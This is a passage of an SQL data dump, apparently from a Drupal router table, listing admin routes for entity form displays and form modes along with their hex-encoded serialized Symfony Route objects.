('entity.entity_form_display.node.default', '/admin/structure/types/manage/{node_type}/form-display', '/admin/structure/types/manage/%/form-display', 61, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35343a222f61646d696e2f7374727563747572652f74797065732f6d616e6167652f7b6e6f64655f747970657d2f666f726d2d646973706c6179223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a353a7b733a31323a225f656e746974795f666f726d223b733a32343a22656e746974795f666f726d5f646973706c61792e65646974223b733a363a225f7469746c65223b733a31393a224d616e61676520666f726d20646973706c6179223b733a31343a22666f726d5f6d6f64655f6e616d65223b733a373a2264656661756c74223b733a31343a22656e746974795f747970655f6964223b733a343a226e6f6465223b733a363a2262756e646c65223b733a303a22223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a32363a225f6669656c645f75695f666f726d5f6d6f64655f616363657373223b733a32383a2261646d696e6973746572206e6f646520666f726d20646973706c6179223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a393a226e6f64655f74797065223b613a323a7b733a343a2274797065223b733a31363a22656e746974793a6e6f64655f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a393a225f6669656c645f7569223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33313a226163636573735f636865636b2e6669656c645f75692e666f726d5f6d6f6465223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a393a226e6f64655f74797065223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37323a227b5e2f61646d696e2f7374727563747572652f74797065732f6d616e6167652f283f503c6e6f64655f747970653e5b5e2f5d2b2b292f666f726d5c2d646973706c6179247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31333a222f666f726d2d646973706c6179223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a393a226e6f64655f74797065223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f7374727563747572652f74797065732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a393a226e6f64655f74797065223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36313b733a31343a227061747465726e4f75746c696e65223b733a34343a222f61646d696e2f7374727563747572652f74797065732f6d616e6167652f252f666f726d2d646973706c6179223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.entity_form_display.node.form_mode', '/admin/structure/types/manage/{node_type}/form-display/{form_mode_name}', '/admin/structure/types/manage/%/form-display/%', 122, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37313a222f61646d696e2f7374727563747572652f74797065732f6d616e6167652f7b6e6f64655f747970657d2f666f726d2d646973706c61792f7b666f726d5f6d6f64655f6e616d657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a31323a225f656e746974795f666f726d223b733a32343a22656e746974795f666f726d5f646973706c61792e65646974223b733a363a225f7469746c65223b733a31393a224d616e61676520666f726d20646973706c6179223b733a31343a22656e746974795f747970655f6964223b733a343a226e6f6465223b733a363a2262756e646c65223b733a303a22223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a32363a225f6669656c645f75695f666f726d5f6d6f64655f616363657373223b733a32383a2261646d696e6973746572206e6f646520666f726d20646973706c6179223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a393a226e6f64655f74797065223b613a323a7b733a343a2274797065223b733a31363a22656e746974793a6e6f64655f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a393a225f6669656c645f7569223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33313a226163636573735f636865636b2e6669656c645f75692e666f726d5f6d6f6465223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a393a226e6f64655f74797065223b693a313b733a31343a22666f726d5f6d6f64655f6e616d65223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a39393a227b5e2f61646d696e2f7374727563747572652f74797065732f6d616e6167652f283f503c6e6f64655f747970653e5b5e2f5d2b2b292f666f726d5c2d646973706c61792f283f503c666f726d5f6d6f64655f6e616d653e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a343a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31343a22666f726d5f6d6f64655f6e616d65223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a31333a222f666f726d2d646973706c6179223b7d693a323b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a393a226e6f64655f74797065223b693a343b623a313b7d693a333b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f7374727563747572652f74797065732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a393a226e6f64655f74797065223b693a313b733a31343a22666f726d5f6d6f64655f6e616d65223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132323b733a31343a227061747465726e4f75746c696e65223b733a34363a222f61646d696e2f7374727563747572652f74797065732f6d616e6167652f252f666f726d2d646973706c61792f25223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('entity.entity_form_display.taxonomy_term.default', '/admin/structure/taxonomy/manage/{taxonomy_vocabulary}/overview/form-display', '/admin/structure/taxonomy/manage/%/overview/form-display', 123, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37363a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f7b7461786f6e6f6d795f766f636162756c6172797d2f6f766572766965772f666f726d2d646973706c6179223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a353a7b733a31323a225f656e746974795f666f726d223b733a32343a22656e746974795f666f726d5f646973706c61792e65646974223b733a363a225f7469746c65223b733a31393a224d616e61676520666f726d20646973706c6179223b733a31343a22666f726d5f6d6f64655f6e616d65223b733a373a2264656661756c74223b733a31343a22656e746974795f747970655f6964223b733a31333a227461786f6e6f6d795f7465726d223b733a363a2262756e646c65223b733a303a22223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a32363a225f6669656c645f75695f666f726d5f6d6f64655f616363657373223b733a33373a2261646d696e6973746572207461786f6e6f6d795f7465726d20666f726d20646973706c6179223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31393a227461786f6e6f6d795f766f636162756c617279223b613a323a7b733a343a2274797065223b733a32363a22656e746974793a7461786f6e6f6d795f766f636162756c617279223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a393a225f6669656c645f7569223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33313a226163636573735f636865636b2e6669656c645f75692e666f726d5f6d6f6465223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31393a227461786f6e6f6d795f766f636162756c617279223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a39343a227b5e2f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f283f503c7461786f6e6f6d795f766f636162756c6172793e5b5e2f5d2b2b292f6f766572766965772f666f726d5c2d646973706c6179247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32323a222f6f766572766965772f666f726d2d646973706c6179223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31393a227461786f6e6f6d795f766f636162756c617279223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a33323a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31393a227461786f6e6f6d795f766f636162756c617279223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132333b733a31343a227061747465726e4f75746c696e65223b733a35363a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f252f6f766572766965772f666f726d2d646973706c6179223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('entity.entity_form_display.taxonomy_term.form_mode', '/admin/structure/taxonomy/manage/{taxonomy_vocabulary}/overview/form-display/{form_mode_name}', '/admin/structure/taxonomy/manage/%/overview/form-display/%', 246, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a39333a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f7b7461786f6e6f6d795f766f636162756c6172797d2f6f766572766965772f666f726d2d646973706c61792f7b666f726d5f6d6f64655f6e616d657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a31323a225f656e746974795f666f726d223b733a32343a22656e746974795f666f726d5f646973706c61792e65646974223b733a363a225f7469746c65223b733a31393a224d616e61676520666f726d20646973706c6179223b733a31343a22656e746974795f747970655f6964223b733a31333a227461786f6e6f6d795f7465726d223b733a363a2262756e646c65223b733a303a22223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a32363a225f6669656c645f75695f666f726d5f6d6f64655f616363657373223b733a33373a2261646d696e6973746572207461786f6e6f6d795f7465726d20666f726d20646973706c6179223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31393a227461786f6e6f6d795f766f636162756c617279223b613a323a7b733a343a2274797065223b733a32363a22656e746974793a7461786f6e6f6d795f766f636162756c617279223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a393a225f6669656c645f7569223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33313a226163636573735f636865636b2e6669656c645f75692e666f726d5f6d6f6465223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31393a227461786f6e6f6d795f766f636162756c617279223b693a313b733a31343a22666f726d5f6d6f64655f6e616d65223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3132313a227b5e2f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f283f503c7461786f6e6f6d795f766f636162756c6172793e5b5e2f5d2b2b292f6f766572766965772f666f726d5c2d646973706c61792f283f503c666f726d5f6d6f64655f6e616d653e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a343a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31343a22666f726d5f6d6f64655f6e616d65223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a32323a222f6f766572766965772f666f726d2d646973706c6179223b7d693a323b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31393a227461786f6e6f6d795f766f636162756c617279223b693a343b623a313b7d693a333b613a323a7b693a303b733a343a2274657874223b693a313b733a33323a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31393a227461786f6e6f6d795f766f636162756c617279223b693a313b733a31343a22666f726d5f6d6f64655f6e616d65223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3234363b733a31343a227061747465726e4f75746c696e65223b733a35383a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f252f6f766572766965772f666f726d2d646973706c61792f25223b733a383a226e756d5061727473223b693a383b7d7d, 8),
('entity.entity_form_display.user.default', '/admin/config/people/accounts/form-display', '/admin/config/people/accounts/form-display', 31, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34323a222f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f666f726d2d646973706c6179223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a353a7b733a31323a225f656e746974795f666f726d223b733a32343a22656e746974795f666f726d5f646973706c61792e65646974223b733a363a225f7469746c65223b733a31393a224d616e61676520666f726d20646973706c6179223b733a31343a22666f726d5f6d6f64655f6e616d65223b733a373a2264656661756c74223b733a31343a22656e746974795f747970655f6964223b733a343a2275736572223b733a363a2262756e646c65223b733a343a2275736572223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a32363a225f6669656c645f75695f666f726d5f6d6f64655f616363657373223b733a32383a2261646d696e6973746572207573657220666f726d20646973706c6179223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a393a225f6669656c645f7569223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33313a226163636573735f636865636b2e6669656c645f75692e666f726d5f6d6f6465223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a35303a227b5e2f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f666f726d5c2d646973706c6179247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a34323a222f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f666f726d2d646973706c6179223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a33313b733a31343a227061747465726e4f75746c696e65223b733a34323a222f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f666f726d2d646973706c6179223b733a383a226e756d5061727473223b693a353b7d7d, 5),
('entity.entity_form_display.user.form_mode', '/admin/config/people/accounts/form-display/{form_mode_name}', '/admin/config/people/accounts/form-display/%', 62, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35393a222f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f666f726d2d646973706c61792f7b666f726d5f6d6f64655f6e616d657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a31323a225f656e746974795f666f726d223b733a32343a22656e746974795f666f726d5f646973706c61792e65646974223b733a363a225f7469746c65223b733a31393a224d616e61676520666f726d20646973706c6179223b733a31343a22656e746974795f747970655f6964223b733a343a2275736572223b733a363a2262756e646c65223b733a343a2275736572223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a32363a225f6669656c645f75695f666f726d5f6d6f64655f616363657373223b733a32383a2261646d696e6973746572207573657220666f726d20646973706c6179223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a393a225f6669656c645f7569223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33313a226163636573735f636865636b2e6669656c645f75692e666f726d5f6d6f6465223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31343a22666f726d5f6d6f64655f6e616d65223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37373a227b5e2f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f666f726d5c2d646973706c61792f283f503c666f726d5f6d6f64655f6e616d653e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31343a22666f726d5f6d6f64655f6e616d65223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a34323a222f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f666f726d2d646973706c6179223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31343a22666f726d5f6d6f64655f6e616d65223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36323b733a31343a227061747465726e4f75746c696e65223b733a34343a222f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f666f726d2d646973706c61792f25223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.entity_form_mode.add_form', '/admin/structure/display-modes/form/add/{entity_type_id}', '/admin/structure/display-modes/form/add/%', 62, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35363a222f61646d696e2f7374727563747572652f646973706c61792d6d6f6465732f666f726d2f6164642f7b656e746974795f747970655f69647d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a32303a22656e746974795f666f726d5f6d6f64652e616464223b733a363a225f7469746c65223b733a31333a2241646420666f726d206d6f6465223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32343a2261646d696e697374657220646973706c6179206d6f646573223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31343a22656e746974795f747970655f6964223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37343a227b5e2f61646d696e2f7374727563747572652f646973706c61795c2d6d6f6465732f666f726d2f6164642f283f503c656e746974795f747970655f69643e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31343a22656e746974795f747970655f6964223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a33393a222f61646d696e2f7374727563747572652f646973706c61792d6d6f6465732f666f726d2f616464223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31343a22656e746974795f747970655f6964223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36323b733a31343a227061747465726e4f75746c696e65223b733a34313a222f61646d696e2f7374727563747572652f646973706c61792d6d6f6465732f666f726d2f6164642f25223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.entity_form_mode.collection', '/admin/structure/display-modes/form', '/admin/structure/display-modes/form', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33353a222f61646d696e2f7374727563747572652f646973706c61792d6d6f6465732f666f726d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f6c697374223b733a31363a22656e746974795f666f726d5f6d6f6465223b733a363a225f7469746c65223b733a31303a22466f726d206d6f646573223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32343a2261646d696e697374657220646973706c6179206d6f646573223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34333a227b5e2f61646d696e2f7374727563747572652f646973706c61795c2d6d6f6465732f666f726d247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a33353a222f61646d696e2f7374727563747572652f646973706c61792d6d6f6465732f666f726d223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a33353a222f61646d696e2f7374727563747572652f646973706c61792d6d6f6465732f666f726d223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('entity.entity_form_mode.config_translation_overview', '/admin/structure/display-modes/form/manage/{entity_form_mode}/translate', '/admin/structure/display-modes/form/manage/%/translate', 125, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37313a222f61646d696e2f7374727563747572652f646973706c61792d6d6f6465732f666f726d2f6d616e6167652f7b656e746974795f666f726d5f6d6f64657d2f7472616e736c617465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a37353a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c436f6e74726f6c6c65725c436f6e6669675472616e736c6174696f6e436f6e74726f6c6c65723a3a6974656d50616765223b733a393a22706c7567696e5f6964223b733a31363a22656e746974795f666f726d5f6d6f6465223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33353a225f636f6e6669675f7472616e736c6174696f6e5f6f766572766965775f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31363a22656e746974795f666f726d5f6d6f6465223b613a323a7b733a343a2274797065223b733a32333a22656e746974793a656e746974795f666f726d5f6d6f6465223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33343a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e6f76657276696577223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31363a22656e746974795f666f726d5f6d6f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a38393a227b5e2f61646d696e2f7374727563747572652f646973706c61795c2d6d6f6465732f666f726d2f6d616e6167652f283f503c656e746974795f666f726d5f6d6f64653e5b5e2f5d2b2b292f7472616e736c617465247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31363a22656e746974795f666f726d5f6d6f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a34323a222f61646d696e2f7374727563747572652f646973706c61792d6d6f6465732f666f726d2f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31363a22656e746974795f666f726d5f6d6f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132353b733a31343a227061747465726e4f75746c696e65223b733a35343a222f61646d696e2f7374727563747572652f646973706c61792d6d6f6465732f666f726d2f6d616e6167652f252f7472616e736c617465223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('entity.entity_form_mode.delete_form', '/admin/structure/display-modes/form/manage/{entity_form_mode}/delete', '/admin/structure/display-modes/form/manage/%/delete', 125, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36383a222f61646d696e2f7374727563747572652f646973706c61792d6d6f6465732f666f726d2f6d616e6167652f7b656e746974795f666f726d5f6d6f64657d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a32333a22656e746974795f666f726d5f6d6f64652e64656c657465223b733a363a225f7469746c65223b733a31363a2244656c65746520666f726d206d6f6465223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a32333a22656e746974795f666f726d5f6d6f64652e64656c657465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31363a22656e746974795f666f726d5f6d6f6465223b613a323a7b733a343a2274797065223b733a32333a22656e746974793a656e746974795f666f726d5f6d6f6465223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b7